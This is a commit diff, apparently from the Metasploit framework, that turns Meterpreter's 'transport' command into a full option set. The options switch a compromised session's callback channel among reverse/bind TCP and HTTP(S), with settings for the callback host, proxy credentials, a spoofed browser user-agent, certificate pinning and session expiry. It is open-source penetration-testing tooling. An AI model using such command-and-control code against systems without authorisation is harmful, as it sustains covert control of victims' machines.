Update transport switching to a full blown command

Transport switching should now support all of the bits and pieces
required to do full switching with all configurable transport options

Author: OJ

lib/rex/post/meterpreter/client_core.rb

@@ -17,6 +17,9 @@
 # URI checksumming stuff
 require 'msf/core/handler/reverse_https'
 
+# certificate hash checking
+require 'rex/parser/x509_certificate'
+
 module Rex
 module Post
 module Meterpreter
@@ -38,6 +41,9 @@ class ClientCore < Extension
   METERPRETER_TRANSPORT_HTTP  = 1
   METERPRETER_TRANSPORT_HTTPS = 2
 
+  DEFAULT_SESSION_EXPIRATION = 24*3600*7
+  DEFAULT_COMMS_TIMEOUT = 300
+
   VALID_TRANSPORTS = {
     'reverse_tcp'   => METERPRETER_TRANSPORT_SSL,
     'reverse_http'  => METERPRETER_TRANSPORT_HTTP,
@@ -253,25 +259,64 @@ def machine_id
   end
 
   def change_transport(opts={})
-    transport = opts[:type].downcase
 
-    unless valid_transport?(transport)
-      raise ArgumentError, "#{transport} is not a valid transport"
+    unless valid_transport?(opts[:transport]) && opts[:lport]
+      return false
+    end
+
+    if opts[:transport].starts_with?('reverse')
+      return false unless opts[:lhost]
+    else
+      # Bind shouldn't have lhost set
+      opts[:lhost] = nil
     end
 
+    transport = VALID_TRANSPORTS[opts[:transport]]
+
     request = Packet.create_request('core_change_transport')
 
-    scheme = transport.split('_')[1]
+    scheme = opts[:transport].split('_')[1]
     url = "#{scheme}://#{opts[:lhost]}:#{opts[:lport]}"
 
-    unless transport.ends_with?('tcp')
+    # do more magic work for http(s) payloads
+    unless opts[:transport].ends_with?('tcp')
       checksum = generate_uri_checksum(URI_CHECKSUM_CONN)
       rand = Rex::Text.rand_text_alphanumeric(16)
       url <<  "/#{checksum}_#{rand}/"
+
+      opts[:comms_timeout] ||= DEFAULT_COMMS_TIMEOUT
+      request.add_tlv(TLV_TYPE_TRANS_COMMS_TIMEOUT, opts[:comms_timeout])
+
+      opts[:session_exp] ||= DEFAULT_SESSION_EXPIRATION
+      request.add_tlv(TLV_TYPE_TRANS_SESSION_EXP, opts[:session_exp])
+
+      # TODO: randomise if not specified?
+      opts[:ua] ||= 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'
+      request.add_tlv(TLV_TYPE_TRANS_UA, opts[:ua])
+
+      if transport == METERPRETER_TRANSPORT_HTTPS && opts[:cert]
+        hash = Rex::Parser::X509Certificate.get_cert_file_hash(opts[:cert])
+        request.add_tlv(TLV_TYPE_TRANS_CERT_HASH, hash)
+      end
+
+      if opts[:proxy_host] && opts[:proxy_port]
+        prefix = 'http://'
+        prefix = 'socks=' if opts[:proxy_type] == 'socks'
+        proxy = "#{prefix}#{opts[:proxy_host]}:#{opts[:proxy_port]}"
+        request.add_tlv(TLV_TYPE_TRANS_PROXY_INFO, proxy)
+
+        if opts[:proxy_user]
+          request.add_tlv(TLV_TYPE_TRANS_PROXY_USER, opts[:proxy_user])
+        end
+        if opts[:proxy_pass]
+          request.add_tlv(TLV_TYPE_TRANS_PROXY_PASS, opts[:proxy_pass])
+        end
+      end
+
     end
 
-    request.add_tlv(TLV_TYPE_TRANSPORT_TYPE, VALID_TRANSPORTS[transport])
-    request.add_tlv(TLV_TYPE_TRANSPORT_URL, url)
+    request.add_tlv(TLV_TYPE_TRANS_TYPE, transport)
+    request.add_tlv(TLV_TYPE_TRANS_URL, url)
 
     client.send_request(request)
     return true
@@ -301,7 +346,7 @@ def migrate(pid, writable_dir = nil)
     }
 
     # We cant migrate into a process that does not exist.
-    if process.nil?
+    unless process
       raise RuntimeError, "Cannot migrate into non existent process", caller
     end
 

lib/rex/post/meterpreter/packet.rb

@@ -88,8 +88,15 @@ module Meterpreter
 TLV_TYPE_MIGRATE_SOCKET_PATH = TLV_META_TYPE_STRING | 409
 
 
-TLV_TYPE_TRANSPORT_TYPE      = TLV_META_TYPE_UINT   | 430
-TLV_TYPE_TRANSPORT_URL       = TLV_META_TYPE_STRING | 431
+TLV_TYPE_TRANS_TYPE          = TLV_META_TYPE_UINT   | 430
+TLV_TYPE_TRANS_URL           = TLV_META_TYPE_STRING | 431
+TLV_TYPE_TRANS_UA            = TLV_META_TYPE_STRING | 432
+TLV_TYPE_TRANS_COMMS_TIMEOUT = TLV_META_TYPE_UINT   | 433
+TLV_TYPE_TRANS_SESSION_EXP   = TLV_META_TYPE_UINT   | 434
+TLV_TYPE_TRANS_CERT_HASH     = TLV_META_TYPE_RAW    | 435
+TLV_TYPE_TRANS_PROXY_INFO    = TLV_META_TYPE_STRING | 436
+TLV_TYPE_TRANS_PROXY_USER    = TLV_META_TYPE_STRING | 437
+TLV_TYPE_TRANS_PROXY_PASS    = TLV_META_TYPE_STRING | 438
 
 TLV_TYPE_MACHINE_ID          = TLV_META_TYPE_STRING | 460
 
@@ -185,8 +192,15 @@ def inspect
       when TLV_TYPE_MIGRATE_LEN; "MIGRATE-LEN"
       when TLV_TYPE_MIGRATE_PAYLOAD; "MIGRATE-PAYLOAD"
       when TLV_TYPE_MIGRATE_ARCH; "MIGRATE-ARCH"
-      when TLV_TYPE_TRANSPORT_TYPE; "TRANSPORT-TYPE"
-      when TLV_TYPE_TRANSPORT_URL; "TRANSPORT-URL"
+      when TLV_TYPE_TRANS_TYPE; "TRANS-TYPE"
+      when TLV_TYPE_TRANS_URL; "TRANS-URL"
+      when TLV_TYPE_TRANS_COMMS_TIMEOUT; "TRANS-COMMS-TIMEOUT"
+      when TLV_TYPE_TRANS_SESSION_EXP; "TRANS-SESSION-EXP"
+      when TLV_TYPE_TRANS_CERT_HASH; "TRANS-CERT-HASH"
+      when TLV_TYPE_TRANS_PROXY_INFO; "TRANS-PROXY-INFO"
+      when TLV_TYPE_TRANS_PROXY_USER; "TRANS-PROXY-USER"
+      when TLV_TYPE_TRANS_PROXY_PASS; "TRANS-PROXY-PASS"
+
       when TLV_TYPE_MACHINE_ID; "MACHINE-ID"
 
       #when Extensions::Stdapi::TLV_TYPE_NETWORK_INTERFACE; 'network-interface'

lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb

@@ -322,48 +322,99 @@ def cmd_irb(*args)
     Rex::Ui::Text::IrbShell.new(binding).run
   end
 
+  #
+  # Get the machine ID of the target
+  #
   def cmd_machine_id(*args)
     print_good("Machine ID: #{client.core.machine_id}")
   end
 
+  #
+  # Arguments for transport switching
+  #
+  @@transport_opts = Rex::Parser::Arguments.new(
+    '-t'  => [ true,  "Transport type: #{Rex::Post::Meterpreter::ClientCore::VALID_TRANSPORTS.keys.join(', ')}" ],
+    '-l'  => [ true,  'LHOST parameter (for reverse transports)' ],
+    '-p'  => [ true,  'LPORT parameter' ],
+    '-ua' => [ true,  'User agent for http(s) transports (optional)' ],
+    '-ph' => [ true,  'Proxy host for http(s) transports (optional)' ],
+    '-pp' => [ true,  'Proxy port for http(s) transports (optional)' ],
+    '-pu' => [ true,  'Proxy username for http(s) transports (optional)' ],
+    '-ps' => [ true,  'Proxy password for http(s) transports (optional)' ],
+    '-pt' => [ true,  'Proxy type for http(s) transports (optional: http, socks; default: http)' ],
+    '-c'  => [ true,  'SSL certificate path for https transport verification (optional)' ],
+    '-to' => [ true,  "Comms timeout (seconds) for http(s) transports (default: #{Rex::Post::Meterpreter::ClientCore::DEFAULT_COMMS_TIMEOUT})" ],
+    '-ex' => [ true,  "Expiration timout (seconds) for http(s) transports (default: #{Rex::Post::Meterpreter::ClientCore::DEFAULT_SESSION_EXPIRATION})" ],
+    '-h'  => [ false, 'Help menu' ])
+
+  def cmd_transport_help
+    print_line('Usage: transport [options]')
+    print_line
+    print_line('Change the current Meterpreter transport mechanism')
+    print_line(@@transport_opts.usage)
+  end
+
   def cmd_transport(*args)
     if ( args.length == 0 or args.include?("-h") )
-      #cmd_transport_help
+      cmd_transport_help
       return
     end
 
-    transport = args.shift.downcase
-    unless client.core.valid_transport?(transport)
-      #cmd_transport_help
-      return
-    end
+    opts = {
+      :transport     => nil,
+      :lhost         => nil,
+      :lport         => nil,
+      :ua            => nil,
+      :proxy_host    => nil,
+      :proxy_port    => nil,
+      :proxy_type    => nil,
+      :proxy_user    => nil,
+      :proxy_pass    => nil,
+      :comms_timeout => nil,
+      :session_exp   => nil,
+      :cert          => nil
+    }
 
-    if transport == 'bind_tcp'
-      unless args.length == 1
-        #cmd_transport_help
-        return
+    @@transport_opts.parse(args) do |opt, idx, val|
+      case opt
+      when '-c'
+        opts[:cert] = val
+      when '-ph'
+        opts[:proxy_host] = val
+      when '-pp'
+        opts[:proxy_port] = val.to_i
+      when '-pt'
+        opts[:proxy_type] = val
+      when '-pu'
+        opts[:proxy_user] = val
+      when '-ps'
+        opts[:proxy_pass] = val
+      when '-ua'
+        opts[:ua] = val
+      when '-to'
+        opts[:comms_timeout] = val.to_i
+      when '-ex'
+        opts[:session_exp] = val.to_i
+      when '-p'
+        opts[:lport] = val.to_i
+      when '-l'
+        opts[:lhost] = val
+      when '-t'
+        unless client.core.valid_transport?(val)
+          cmd_transport_help
+          return
+        end
+        opts[:transport] = val
       end
+    end
 
-      lhost = ""
-      lport = args.shift.to_i
+    print_status("Swapping transport ...")
+    if client.core.change_transport(opts)
+      client.shutdown_passive_dispatcher
+      shell.stop
     else
-      unless args.length == 2
-        #cmd_transport_help
-        return
-      end
-
-      lhost = args.shift
-      lport = args.shift.to_i
+      print_error("Failed to switch transport, please check the parameters")
     end
-
-    print_status("Swapping transport to #{transport} at #{lhost}:#{lport} ...")
-    client.core.change_transport({
-      :type   => transport,
-      :lhost  => lhost,
-      :lport  => lport
-    })
-    client.shutdown_passive_dispatcher
-    shell.stop
   end
 
   def cmd_migrate_help